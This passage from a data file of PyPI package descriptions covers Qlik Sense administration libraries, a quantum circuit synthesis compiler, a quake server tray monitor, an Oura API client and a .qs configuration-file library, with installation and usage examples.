otherwisems=app.measures['MyMeasure']ms.delete()app.save()Measure.rename()Renames the measure on the Qlik Sense Server.Returns:\nTrue if the measure was renamed successfully, False otherwisems=app.measures['MyMeasure']ms.rename('MyMeasureNewName')app.save()Measure.get_layout()Returns the json layout of the measure; a shortcut to the GetLayout method of the Engine APIms.get_layout()Dimension classThe class represents master dimensions of the application and is a member of the App.dimensions collection. You can access a specific dimension by its name or iterate through them. 
Note that hierarchical dimensions are not yet supported.\"dim=app.dimensions['MyDimension']print(dim.definition)fordiminapp.dimensions:ifdim.definition=='[Customer]':dim.update(name='Customer_dimension')Dimension propertiesname: the name of the dimension you generally use in the Qlik Sense interfacedefinition: the formula behind the dimensionlabel: the label of the dimension, as it appears in chartsauxiliaryhandle: the internal handle of the object in the Qlik Sense Engine API; can be used to access the dimension via thequery()functionapp_handle: the handle of the parent App objectid: Qlik Sense internal id of the dimensionparent: AppChildren object; you can access the App class object like thisdim.parent.parentcreated_date: creation date of the dimension, as stored in Qlik Sensemodified_date: date of the last modification of the dimension, as stored in Qlik SenseDimension.update()Updates the dimension on the Qlik Sense ServerArgs:definition (str, optional): The definition of the dimensionlabel (str, optional): the label of the dimension, as it appears in chartsReturns:\nTrue if the dimension was updated successfully, False otherwisedim=app.dimensions['MyDimension']dim.update(definition='Customer',label='Customer_dimension')app.save()Dimension.delete()Deletes the dimension from the Qlik Sense ServerReturns:\nTrue if the dimension was deleted successfully, False otherwisedim=app.dimensions['MyDimension']dim.delete()app.save()Dimension.rename()Renames the dimension on the Qlik Sense Server.Returns:\nTrue if the dimension was renamed succesfully, False otherwisedim=app.dimensions['MyDimension']dim.rename('MyDimensionNewName')app.save()Dimension.get_layout()Returns the json layout of the dimension; a shortcut to the GetLayout method of the Engine APIdim.get_layout()Sheet classThe class represents the sheets of the application and is a member of the App.sheets collection. You can access objects on the sheets, such as charts and tables, via the Sheet class object.forshinapp.sheets:print(sh.name)Sheet propertiesname: that's the name of the sheetdescription: the description of the sheetauxiliaryhandle: the internal handle of the object in Qlik Sense Engine API; can be used to access the sheet via thequery()functionapp_handle: the handle of the parent App objectid: Qlik Sense internal id of the sheetparent: AppChildren object; you can access the App class object like thisms.parent.parentcreated_date: creation date of the sheet, as stored in Qlik Sensemodified_date: date of the last modification of the sheet, as stored in Qlik Sensepublished: True if the sheet is published, False if notapproved: True if the sheet is approved, False if notowner_id: GUID of the owner of the sheetowner_name: name of the owner of the sheetSheet.load()Loads objects from the sheet in a Qlik Sense application into a Sheet class objectsh=App.sheets['MySheet']sh.load()forobjinsh.objects:print(obj.type)Sheet.get_layout()Returns the json layout of the sheet; a shortcut to the GetLayout method of the Engine APIsh.get_layout()Field classThe class represents the fields of the application and is a member of the App.fields collection. 
You can only use the class for information purposes; no changes can be made with fields via QSEA.\"forfldinapp.fields:print(field.table_name,field.name)Field propertiesname: name of the field, as it appears in the modeltable_name: name of the table, containing the fieldinformation_density, non_nulls, rows_count, subset_ratio, distinct_values_count, present_distinct_values, key_type, tags: properties of the fields as they can be found in the data modelauxiliaryhandle: internal handle of the field objectapp_handle: handle of the parent App objectObject classThe class represents the objects on the sheet, such as charts and tables, and is a member of the SheetChildren collection.Object propertiestype: type of the object, such as 'piechart' or 'pivot-table'col, row, colspan, rowspan, bounds_y, bounds_x, bounds_width, bounds_height: parameters referring to the location of an object on the sheetauxiliaryhandle: the internal handle of the object in the Qlik Sense Engine API; can be used to access the object via thequery()functionsheet_handle: handle of the parent sheetsheet: the Sheet object, on which the object itself is locatedid: Qlik Sense internal id of the objectparent: SheetChildren objectObject.export_data()Performs data export of an object (such as a table or chart) to an xslx or csv file.Args:file_type (str, optional): 'xlsx' or 'csv', 'xlsx' by defaultReturns: the path to the downloaded file in case of success, None if failedObject.load()Loads measures and dimensions of the object in a Qlik Sense application into an Object class instance.sh=App.sheets['MySheet']sh.load()forobjinsh.objects:ifobj.type=='piechart':obj.load()print(obj.dimensions.count)Object.get_layout()Returns the json layout of the object; a shortcut to the GetLayout method of the Engine APIobj.get_layout()ObjectChildren classThe class contains collections of measures and dimensions in the object on the sheet:object.measures: a collection of ObjectMeasure class objects, representing the measures in the object on the sheetobject.dimensions: a collection of ObjectDimension class objects, representing the dimensions in the object on the sheetYou can access the main information in pandas DataFrame via.df:App.sheets['MySheet'].objects['object_id'].measures.dfAdding measures and dimensions to app objects is not supported yet.ObjectMeasure classThis class represents measures of the object on the sheet and is a member of the object.measures collection. Since there may be no specific name for the measure in the object, the internal Qlik ID is used instead of the name. 
Thus, you can either iterate through measures or call them by the internal Qlik ID:ms=obj.measures['measure_id']print(ms.definition)formsinobj.measures:ifms.definition=='sum(Sales)':ms.update(definition='sum(Incomes)')ObjectMeasure propertiesname: internal Qlik id of the measuredefinition: the formula behind the measurelabel: the label of the measure, as it appears in the chartslabel_expression: the label expression of the measurecalc_condition: calculation condition for the measurelibrary_id: if a master measure is used, this refers to its IDformat_type: Format type of the object'U' for auto'F' for number'M' for money'D' for date'IV' for duration'R' for otherformat_ndec: Number of decimals of the objectformat_use_thou: Use thousands separator for the objectformat_dec: Decimal separator for the objectformat_thou: Thousands separator for the objectauxiliaryapp_handle: the handle of the parent App objectparent: ObjectChildren objectobject: you can access the Object class object like thisms.objectObjectMeasure.update()Updates the measure in the object on the sheet.Args:definition (str, optional): The definition of the measurelabel (str, optional): the new label of the measure, as it appears in chartslabel_expression (str, optional): the label expression of the measurecalc_condition (str, optional): calculation condition for the measurelibrary_id (str, optional): id of the master measureformat_type (str, optional): Format type of the object. Defaults to 'U'.'U' for auto'F' for number'M' for money'D' for date'IV' for duration'R' for otherformat_use_thou (int, optional): Use thousands separator for the object. Defaults to 0.format_dec (str, optional): Decimal separator for the object. Defaults to ','.format_thou (str, optional): Thousands separator for the object. Defaults to ''.Returns:\nTrue if the measure was updated successfully, False otherwisems=obj.measures['measure_id']ms.update(definition='sum(Sales)',label='Total Sales',format_type='F')app.save()ObjectMeasure.delete()Deletes the measure from the object on the sheetReturns:\nTrue if the measure was deleted successfully, False otherwisems=obj.measures['measure_id']ms.delete()app.save()ObjectDimension classThis class represents dimensions of the object on the sheet and is a member of the object.dimensions collection. Since there may be no specific name for the dimension in the object, the internal Qlik ID is used instead of the name. 
Thus, you can either iterate through dimensions or call them by the internal Qlik ID:dim=obj.measures['dimension_id']print(dim.definition)fordiminobj.dimensions:ifdim.definition=='[Customer]':dim.update(definition='[Supplier]')Note that hierarchical dimensions are not supported yet.ObjectDimension propertiesname: internal Qlik id of the dimensiondefinition: the formula behind the dimensionlabel: the label of the dimension, as it appears in the chartsauxiliaryapp_handle: the handle of the parent App objectparent: ObjectChildren objectobject: you can access the Object class object like thisdim.objectObjectDimension.update()Updates the dimension in the object on the sheetArgs:definition (str, optional): the definition of the dimensionlabel (str, optional): the label of the dimension, as it appears in chartscalc_condition (str, optional): calculation condition for the dimensionReturns:\nTrue if the dimension was updated successfully, False otherwisedim=obj.dimensions['dimension_id']dim.update(definition='Customer',label='Customer_dimension')app.save()ObjectDimension.delete()Deletes the dimension from the Qlik Sense ServerReturns:\nTrue if the dimension was deleted successfully, False otherwisedim=app.dimensions['dimension_id']dim.delete()app.save()LicenseThis project is licensed under the MIT License - see theLICENSEfile for details.History[0.0.17] - 2024-01-31Fixed some problems that occured if the connection class object was recreated before terminating the connection to Qlik Sense Engine API[0.0.16] - 2023-10-03Minor changes[0.0.15] - 2023-10-03Minor changes[0.0.14] - 2023-10-01Addedobject.export_data() function which performs data export of an object (such as a table or chart) to an xslx or csv fileget_layout() function for measures, dimensions, variables, sheets and objects; the functions return the json layout"} +{"package": "qsearch", "pacakge-description": "qsearchAn implementation of a quantum gate synthesis algorithm based on A* and numerical optimization. It relies onNumPyandSciPy. It can export code forQiskitandOpenQASM.This is an implementation of the algorithm described in the paperTowards Optimal Topology Aware Quantum Circuit Synthesis.These are some results showing how qsearch can provide optimal or near optimal results. We compare results to theUniversalQ Compiler.Circuit# of QubitsRef #CNOT LinearCNOT RingUQ (CNOT Ring)CNOT Linear Unitary DistanceCNOT Ring Unitary DistanceQFT367*6*151.33 * 10-142.22 * 10-16Fredkin388791.76 * 10-140.0Toffoli368691.14 * 10-140.0Peres3576191.13 * 10-140.0HHL3N/A3*3*161.25 * 10-140.0Or3686101.72 * 10-140.0EntangledX342,3,42,3,491.26 * 10-140.0TFIM_3_33444170.00.0TFIM_6_33866174.44 * 10-160.0TFIM_42_335666178.88 * 10-160.0TFIM_60_338066176.66 * 10-160.0QFT4N/A13*896.66 * 10-16TFIM_30_446011879.08 * 10-11IBM Challenge4N/A4DNR0.0* Some gates occasionally resulted in circuits with different CNOT counts due to the optimizers getting stuck in local minima. The best run out of 10 is listed in these cases. The CNOT count for these circuits was occasionally 1 more than listed. The gate \"EntangledX\" is a parameterized gate, and for certain combinations of parameters we were able to produce solutions with fewer CNOTs than the hand-optimized general solution.InstallationThis is a python package which can be installed using pip. You will need a Python version of at least 3.6. The qsearch compiler currently runs on macOS, Linux (includingthe Windows Subsystem for Linux) and Windows (performance is much worse on Windows). 
You can install it from PyPI using:

pip3 install qsearch

You can also install from the git repository:

pip3 install https://github.com/BQSKit/qsearch/archive/dev.zip

or download and install it:

git clone https://github.com/BQSKit/qsearch
pip3 install --upgrade ./qsearch

If you make changes to your local copy, you can reinstall the package:

pip3 install --upgrade ./qsearch

Once installed, you can import the library like any other python package:

import qsearch

Getting Started: qsearch Projects
The simplest way to use the qsearch library is by using a project. When you create a project, you provide a path where a directory will be created to contain the project's files.

import qsearch
myproject = qsearch.Project("desired/path/to/project/directory")

You can then add unitaries to compile, and set compiler properties. Unitary matrices should be provided as numpy ndarrays using dtype="complex128".

myproject.add_compilation("gate_name", gate_unitary)
myproject["compiler_option"] = value

Once your project is configured, you can start your project by calling run(). The compiler uses an automatic checkpointing system, so if it is killed while in-progress, it can be resumed by calling run() again.

myproject.run()

Once your project is finished, you can get OpenQASM output:

myproject.assemble("gate_name") # This will return a string of OpenQASM
myproject.assemble("gate_name", write_location="path/to/output/file") # This will write the qasm to the specified path.

Compiling Without Projects
If you would like to avoid working with Projects, you can use the SearchCompiler class directly.

import qsearch
compiler = qsearch.SearchCompiler()
result = compiler.compile(target=target_unitary)

The SearchCompiler class and the compile function can take extra arguments to further configure the compiler. The returned value is a dictionary that contains the unitary that represents the implemented circuit, the qsearch.gates.Gate representation of the circuit structure, and the vector of parameters for the circuit structure.

A Note On Endianness
We use the physics convention of using big endian when naming our qubits. Some quantum programs, including IBM's Qiskit, use little endian. This means you will need to reverse the endianness of a unitary designed for Qiskit in order to work with our code, or vice versa.
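As background for the helper introduced next, here is a minimal, self-contained numpy sketch of what reversing the qubit ordering does to a 2-qubit unitary. This is an illustration only, not qsearch code; for real work, prefer the qsearch utility shown below.

```python
# Illustration (assumed example, not part of qsearch): swapping the qubit order of a
# 2-qubit unitary by permuting the computational basis |q1 q0> -> |q0 q1>.
import numpy as np

def reverse_qubit_order_2q(u):
    # In the basis |00>, |01>, |10>, |11>, exchanging the two qubits swaps |01> and |10>.
    perm = np.eye(4)[[0, 2, 1, 3]]
    return perm @ u @ perm.T

# CNOT with the most significant qubit as control (big-endian convention)...
cnot_big = np.array([[1, 0, 0, 0],
                     [0, 1, 0, 0],
                     [0, 0, 0, 1],
                     [0, 0, 1, 0]], dtype="complex128")

# ...turns into CNOT with the least significant qubit as control after the reversal.
cnot_little = reverse_qubit_order_2q(cnot_big)
print(cnot_little.real)
```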
We provide a function that performs endian reversal on numpy matrices:little_endian = qsearch.utils.endian_reverse(big_endian) # you can use the same function to convert in the other direction as wellDocumentation and ExamplesThe documentation and API reference can be foundon readthedocs.Also check out theexamples!Legal/Copyright informationPlease read ourLICENSE"} +{"package": "q_searcher", "pacakge-description": "\u91cf\u5316\u7684\u65f6\u5e8f\u51fd\u6570\u5305\u6295\u7814\u56e2\u961f\u81ea\u7528\u5305\uff0c\u51fa\u95ee\u9898\u4e86\u8bf7\u63d0 Issue\u3001\u4fee\u590d\u540e\u8bf7\u5173\u95ed Issue\u3002\u529f\u80fd\u5217\u8868\u521d\u59cb\u5316td_init_run(configs=None)\uff1a\u521d\u59cb\u5316\u5305td_db_connect()\uff1a\u83b7\u53d6\u4e00\u4e2a\u6570\u636e\u5e93\u8fde\u63a5A \u80a1\u83b7\u53d6\u4fe1\u606f\u83b7\u53d6\u6240\u6709\u6307\u6570\uff08\u80a1\u7968\u5e02\u573a\u3001\u5f53\u524d\u6709\u6548\u7684\uff09: get_all_index\u83b7\u53d6\u6240\u6709\u80a1\u7968\uff08\u80a1\u7968\u5e02\u573a\u3001\u5f53\u524d\u6709\u6548\u7684\uff09: get_all_security\u83b7\u53d6\u6807\u7684\u7684\u6700\u65b0\u4fe1\u606f\uff08\u80a1\u7968\u5e02\u573a\u3001\u4e0d\u5305\u542b\u672a\u6765\uff09: get_data\u83b7\u53d6\u9f99\u864e\u699c\u80a1\u7968\u5217\u8868: get_dragon_tiger_listCode/Style Linter\u6211\u4eec\u4f7f\u7528Ruff\u4f5c\u4e3a\u4ee3\u7801\u68c0\u67e5\u5668\uff0c\u8bf7\u5728\u63d0\u4ea4\u524d\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\uff0c\u786e\u4fdd PR \u7684\u987a\u5229\u8fdb\u884c\uff1aruff check .ruff format .\u6253\u5305\u66f4\u65b0pyproject.toml\u6587\u4ef6\u6267\u884c./build.sh\u8f93\u5165 API token\u65e7\u7684\u6253\u5305\u65b9\u5f0f\uff1a\u66f4\u65b0pyproject.toml\u6587\u4ef6\u6267\u884cpython -m build\u6267\u884cpython -m twine upload dist/*\u5bf9\u8f93\u5165\u6846\uff0c\u8f93\u5165\u8d26\u53f7:__token__\u5e76\u56de\u8f66\u6700\u540e\u8f93\u5165 API token \u5373\u53ef\u6d4b\u8bd5\u9700\u8981\u8fd0\u884c\u81ea\u52a8\u5316\u6d4b\u8bd5\uff1fpoetry run pytest\u5982\u679c\u4f60\u5e0c\u671b\u4f7f\u7528 Poetry \u63d0\u4f9b\u7684\u865a\u62df\u673a\u5236\uff0c\u4e5f\u9700\u8981\u672c\u5730\u63d0\u793a\u3002\u8bd5\u8bd5\u8fd9\u4e2a\uff1a\u6267\u884cpython -m build\u672c\u5730\u5b89\u88c5\u5305pip install dist [package-...-any.whl]"} +{"package": "qsee", "pacakge-description": "### qsee: A quantum object search engineContributors: Vu Tuan Hai, Nguyen Tan Viet, Le Bin HoDescription: Quantum programming is being used to address multiple problems in quantum technology fields, from quantum machine learning, quantum computing to quantum physics. Recent advances revolve around the use of quantum programming and quantum compiling, which promises to revolutionize program computation and boost quantum state preparation and tomography\u2019s problem-solving capabilities. However, using quantum computing technologies requires high-level coding skills, which is not trivial for physics scientists. For such a reason, we propose qsee, a Python library that allows researchers and practitioners to configure and experiment with quantum compilation pipelines, within save and load results features for science reports. 
We showcase the architecture and main features of qsee, other than discussing its envisioned impact on research and practice.How to use:Additional information:Code of conducting:License: MIT LICENSE"} +{"package": "qseispy", "pacakge-description": "QseisPyA python version of Qseis for calculating 1D synthetic seismograms.WARNING: QseisPy is still very new and under development.poetry config [pypi-token]\n\npoetry build -f wheel\n\npoetry publish"} +{"package": "qself", "pacakge-description": "qselfThis file will become your README and also the index of your\ndocumentation.InstallpipinstallqselfHow to useimportosfromqself.ouraimportOuraAPIClientclient=OuraAPIClient(os.environ[\"OURA_PERSONAL_ACCESS_TOKEN\"])Note that this assumes that theOURA_PERSONAL_ACCESS_TOKENenvironment\nvariable contains a personal access token which you can createhere."} +{"package": "qsemailer", "pacakge-description": "No description available on PyPI."} +{"package": "qsense", "pacakge-description": "qSenseqsenseis a python library and command line tool for QLIK QlikSense. It contains some useful functions for administrators/developers of QLiksenseIt is built on top of the python librariesqsAPIandpyqlikengineInstallationpip install qsenseUsageexport LOGLEVEL=DEBUGNAMEqsense-qsenseisapythonlibraryandcommandlinetoolforQliksenseadministrators\n\nSYNOPSISqsenseCOMMAND\n\nDESCRIPTIONqsenseisapythonlibraryandcommandlinetoolforQliksenseadministrators\n\nCOMMANDSCOMMANDisoneofthefollowing:add_entityaddanewentity(user,stream,dataconnection,...)deallocate_analyzer_licenses_for_professionalsDeallocateanalyzerlicensefomuserswithaprofessionallicensedeallocate_unused_analyzer_licensesDeallocateanalyzerlicensenotusedforNdaysdelete_removed_exernally_usersDeleteusersthatwereremovedexternally(fromactivedirectory?)delete_user_sessiondeleteusersessionentityGetaspecificentitybyIDorentitylistorcountexport_appsExport(publishedorpassinganyotherfilter)applicationstoqvdfilesgetgenericgethttpfromQlik(servicecanbeqrsorqps)get_app_connectionsExtracttheconnectionsfromanappget_app_dataconnectionsExtractthedataconnectionsfoundintheappscriptget_app_scriptExtracttheETLscriptfromanapphealthcheckGetaspecificentitybyIDorentitylistorcountold_appsFindoldappsusing'modified_date'and'last_reload_time'filters:thenyoucanexportthemordeleteornotifyviaemailtheownersopen_docLoadanappinmemory,usefulforpreloadinganapp/cachawarmerpostNOTTESTED:genericposthttptoQlik(servicecanbeqrsorqps)update_custom_property_with_users_listupdatethevaluesofacustompropertywiththelistofallqliksenseusersupdate_entityupdateanentity(user,stream,dataconnection,...)user_sessionsusersessionsusersGetuserswithgroupsusers_with_unpublished_appsFinduserswithtoomanyunpublishedappsLook at the source file qsense/command_line.py for detailsExamplesChanging all data connections after a file server migrationJSONFILE=ds-shares.json\nrm$JSONFILEqsensegetqlikserver.redaelli.orgclient.pem/qrs/dataconnection/full--pFilter\"connectionstring sw '\\\\\\\\\\\\\\amzn'\"|jq'.'>$JSONFILEsed-e's/amznfsx94rgsb1e/amznfsxe9chyjel/g'${JSONFILE}>new-${JSONFILE}qsenseupdate_entityqlikserver.redaelli.orgclient.pemdataconnectionnew-${JSONFILE}Exporting and/or deleting old applicationsNot published and not updated/reloaded in the last 120 daysqsenseold_appsqlikserver.redaelli.orgclient.pem/qrs/dataconnection/full--target_path/tmp--modified_days=120--last_reload_days=120--export--deletePublished in some specific streams and not updated/reloaded in the last 120 
daysqsenseold_appsqlikserver.redaelli.orgclient.pem/qrs/dataconnection/full--target_path/tmp--modified_days=120--last_reload_days=120--published--pFilter\"(stream.name eq '000' or stream.name eq 'AAA' or stream.name eq 'BBB' or stream.name eq 'CCC')\"--export--deleteRemoving analyzer licenses for professional usersqsensedeallocate_analyzer_licenses_for_professionalsqlikserver.redaelli.orgclient.pem--nodryrunTop users with unpublished appsqsenseusers_with_unpublished_appsqlikserver.redaelli.orgclient.pem--threshold30"} +{"package": "qsentry", "pacakge-description": "QsentryQsentry is a command line wrapper for Sentry's API.Some Command ExamplesTop level commands$ qsentry --help\nUsage: qsentry [OPTIONS] COMMAND [ARGS]...\n\nOptions:\n --help Show this message and exit.\n\nCommands:\n get Display resources such as members, teams, organizations and etc.\n update Update a resource such as a client keyGet command$ qsentry members --help\nUsage: qsentry get [OPTIONS] COMMAND [ARGS]...\n\n Display resources such as members, teams, organizations and etc.\n\nOptions:\n --help Show this message and exit.\n\nCommands:\n client-keys Get all client keys of the given project.\n members Get the members\n projects Get the projects\n teams Get the teams\n users Get all users of the given organization."} +{"package": "qserious", "pacakge-description": "UNKNOWN"} +{"package": "qserve", "pacakge-description": "No description available on PyPI."} +{"package": "qserver", "pacakge-description": "QServerThis is only a dummy package to prevent malicious packages with similar names. Current version of server is not open-source"} +{"package": "q-server", "pacakge-description": "Q-ServerThis is only a dummy package to prevent malicious packages with similar names. Current version of server is not open-source."} +{"package": "qserverinfo", "pacakge-description": "QServerInfoShows info about quake servers in the trayHow to install (linux only)pipinstallqserverinfoUsageqserverinfo[IP]:[PORT]Additional arguments:-n NAME, --name NAME server name, it will be shown in GUI\n-it ICON_TITLE, --icon-title ICON_TITLE\n text on top of icon\n-rd REQUEST_DELAY, --request-delay REQUEST_DELAY\n how often server will be requested; in seconds, minimum 30, default 60\n-fb, --filter-bots remove bots from players count if possible\n-e EXECUTABLE, --executable EXECUTABLE\n path to game executable which will start after \"Join\" button click with parameter \"+connect
\"\n-m, --show-mapname display mapname in the window if possibleSupported gamesPossibly all games that supported byhttps://github.com/cetteup/pyq3serverlistWhat I tested and its working:XonoticOpenArenaWarsowDoombringerNot working:QuakeWorldAlienArena"} +{"package": "qservice", "pacakge-description": "No description available on PyPI."} +{"package": "qservices-library", "pacakge-description": "No description available on PyPI."} +{"package": "qset-python-client", "pacakge-description": "No description available on PyPI."} +{"package": "qset-tslib", "pacakge-description": "No description available on PyPI."} +{"package": "qs-files", "pacakge-description": "qs-filesqs-files- \u044d\u0442\u043e Python \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u0430\u044f \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u0430\u043c\u0438 \u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\u043c\u0438 \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 .qs. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0439 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u043b\u0435\u0433\u043a\u043e \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c, \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u044c \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0432 \u0432\u0430\u0448\u0438\u0445 Python \u043f\u0440\u043e\u0435\u043a\u0442\u0430\u0445.\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430\u0412\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e pip:pipinstallqs-files\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435qs-files\u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0443\u0434\u043e\u0431\u043d\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 .qs \u0444\u0430\u0439\u043b\u0430\u043c\u0438. 
\u041e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442:\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0438 \u043f\u0430\u0440\u0441\u0438\u043d\u0433 .qs \u0444\u0430\u0439\u043b\u043e\u0432.\u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435, \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0439.\u041f\u043e\u0438\u0441\u043a .qs \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u043e\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438.\u042d\u0442\u0430 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 Python 3.7 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438.\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u041f\u0440\u043e\u0441\u0442\u043e\u0439 \u043f\u0440\u0438\u043c\u0435\u0440 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438:importosimportjsonimportloggingimportrequestsimportrandomfromqs_files.configsimportConfigs# \u041d\u0430\u0441\u0442\u0440\u043e\u0438\u043c \u043b\u043e\u0433\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0434\u043b\u044f \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u043d\u0438\u044f \u0441\u043e\u0431\u044b\u0442\u0438\u0439logging.basicConfig(filename='app.log',level=logging.INFO,format='%(asctime)s-%(levelname)s:%(message)s')# \u0421\u043e\u0437\u0434\u0430\u0435\u043c \u043e\u0431\u044a\u0435\u043a\u0442 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u0444\u0430\u0439\u043b\u043e\u043c .env/config.qsconfig=Configs('.env/config.qs')# \u0417\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044e \u0438\u0437 \u0444\u0430\u0439\u043b\u0430config.load()# \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0438\u0437 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438value=config.get_value('section_name','key_name')# \u0418\u0437\u043c\u0435\u043d\u044f\u0435\u043c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u043c \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044econfig.set_value('section_name','key_name','new_value')config.save()# \u0421\u043e\u0437\u0434\u0430\u0435\u043c \u043d\u043e\u0432\u0443\u044e \u0441\u0435\u043a\u0446\u0438\u044e \u0438 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0432 \u043d\u0435\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044fnew_section_data={'new_key_1':'value_1','new_key_2':'value_2'}config.set_section('new_section',new_section_data)# \u0414\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u043d\u043e\u0432\u043e\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0432 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0443\u044e \u0441\u0435\u043a\u0446\u0438\u044econfig.add_value('existing_section','new_key','new_value')# \u0423\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u043c 
\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u0431\u044d\u043a\u0430\u043f\u043e\u0432config.set_backup_time(24)# \u0412\u043a\u043b\u044e\u0447\u0430\u0435\u043c \u0431\u044d\u043a\u0430\u043f\u044bconfig.backup(enable=True)# \u0421\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044econfig.save()# \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0441\u0435\u043a\u0446\u0438\u0438 'existing_section' \u043f\u043e\u0441\u043b\u0435 \u0432\u0441\u0435\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439section_data=config.get_section('existing_section')logging.info(f\"\u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0441\u0435\u043a\u0446\u0438\u0438 'existing_section':{section_data}\")# \u0421\u043e\u0437\u0434\u0430\u0435\u043c \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u043c JSON-\u0444\u0430\u0439\u043b \u0441 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u0438\u0437 \u0441\u0435\u043a\u0446\u0438\u0438json_data=json.dumps(section_data)withopen('config_data.json','w')asjson_file:json_file.write(json_data)# \u0412\u044b\u0432\u043e\u0434\u0438\u043c \u0441\u043f\u0438\u0441\u043e\u043a \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438file_list=os.listdir('.')logging.info(f\"\u0421\u043f\u0438\u0441\u043e\u043a \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438:{file_list}\")# \u0412\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c HTTP-\u0437\u0430\u043f\u0440\u043e\u0441 \u043a \u0441\u0430\u0439\u0442\u0443response=requests.get('https://jsonplaceholder.typicode.com/posts/1')ifresponse.status_code==200:post_data=response.json()logging.info(f\"\u0414\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u0430:{post_data}\")else:logging.error(f\"\u041e\u0448\u0438\u0431\u043a\u0430 \u043f\u0440\u0438 